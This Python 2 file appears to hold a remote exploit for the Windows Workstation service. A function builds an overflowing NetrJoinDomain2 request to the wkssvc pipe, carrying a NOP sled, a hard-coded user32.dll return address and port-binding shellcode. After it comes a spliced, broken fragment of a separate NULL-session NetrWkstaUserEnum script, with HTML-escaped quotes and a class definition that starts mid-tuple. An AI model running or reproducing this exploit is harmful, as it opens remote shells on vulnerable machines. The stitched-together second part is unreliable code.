def DCEconnectAndExploit(target, domain):
    """Send a hand-built request (opnum 0x16, NetrJoinDomain2 per the
    author's comments) to the wkssvc named pipe on *target*.

    Connects the named-pipe transport, binds interface
    6bffd098-a112-3610-9833-46c3f87e345a v1.0 (WKSSVC) and sends
    ``query1 + query2 + query3``: a fixed hostname block, a length-prefixed
    NUL-interleaved copy of *domain* (length = ``baselen`` + len(domain)),
    and a filler-padded block carrying the author's return address and
    shellcode. No reply is read and nothing is returned; connection and
    call errors propagate to the caller.

    ``transport``, ``uuid`` and ``struct`` must be imported by the
    enclosing module. The ``'port': 445`` entry in the binding dict is not
    referenced by the template and has no effect.
    """
    baselen = 3708

    stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
    stringbinding %= {
        'host': target,
        'pipe': 'wkssvc',
        'port': 445,
    }

    print 'Connecting to named pipe (wkssvc)'
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.connect()
    print 'Setting up DCE transport'
    dce = trans.DCERPC_class(trans)
    dce.bind(
        uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')))

    print 'Sending attack payload to target'
    #NetrJoinDomain2 data: Hostname
    query1 = "\xaa\xbb\xcc\xdd"
    query1 += "\x07\x00\x00\x00"
    query1 += "\x00\x00\x00\x00"
    query1 += "\x07\x00\x00\x00"
    query1 += "\x5C\x00\x5C\x00"
    query1 += "\x41\x00\x55\x00"
    query1 += "\x58\x00\x37\x00"
    query1 += "\x00\x00\x00\x00"

    #NetrJoinDomain2 data: Domain/Hostname

    # Interleave a NUL after every character of *domain* (ASCII -> UTF-16LE).
    targetd = '\x00'.join(list(domain)) + '\x00'
    Len = baselen + len(domain)
    # Three length/offset words, then the interleaved domain string.
    query2 = struct.pack('L', Len)
    query2 += struct.pack('L', 0)
    query2 += struct.pack('L', Len)
    query2 += targetd

    # Filler, jump, hard-coded address and shellcode; the line order is the
    # byte layout of the request and the constants are build-specific.
    query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
    query3 += "\x90\x90" * 1058
    query3 += "\xEB\x06"  #6 byte jump from current pointer in ebx
    query3 += "\x27\x16\xE1\x77"  #Address from user32.dll (0x77E11627)
    #350 byte port binding shellcode
    query3 += "\x90\x90\x90\x90\x90\x90"
    query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
    query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
    query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
    query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
    query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
    query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
    query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
    query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
    query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
    query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
    query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
    query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
    query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
    query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
    query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
    query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
    query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
    query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
    query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
    query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
    query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
    query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
    query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
    query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
    query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
    query3 += "\x90\x90" * 2467
    query3 += "\x00\x00"

    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00\x00\x00"
    query3 += "\x00\x00"
    query3 += "\x01\x00\x00\x00"

    # Send as opnum 0x16; the response is never read here.
    query = query1 + query2 + query3
    dce.call(0x16, query)
       ('null_pointer', '&lt;L=0'),
       ('max_len', '&lt;L'),
       ('referent_id2', '&lt;L=0x43434343'),
       ('enumeration_handle', '&lt;L=0x00000000'),
   )

query = NetrWkstaUserEnum()
server = &quot;%s\x00&quot; % (host)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(server)
query['server']['max'] = len(server)
query['server']['str'] = utf16(server)
query['max_len'] = memory_size

trans = transport.DCERPCTransportFactory(stringbinding)

print &quot;[*] Connecting to %s:445 (NULL Session)&quot; % (host)

try:
  trans.connect()

except Exception, err:
  print &quot;[-] %s&quot; % (err)
  exit()

print &quot;[+] Connected&quot;

dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1])))
dce.call(query.opnum, query)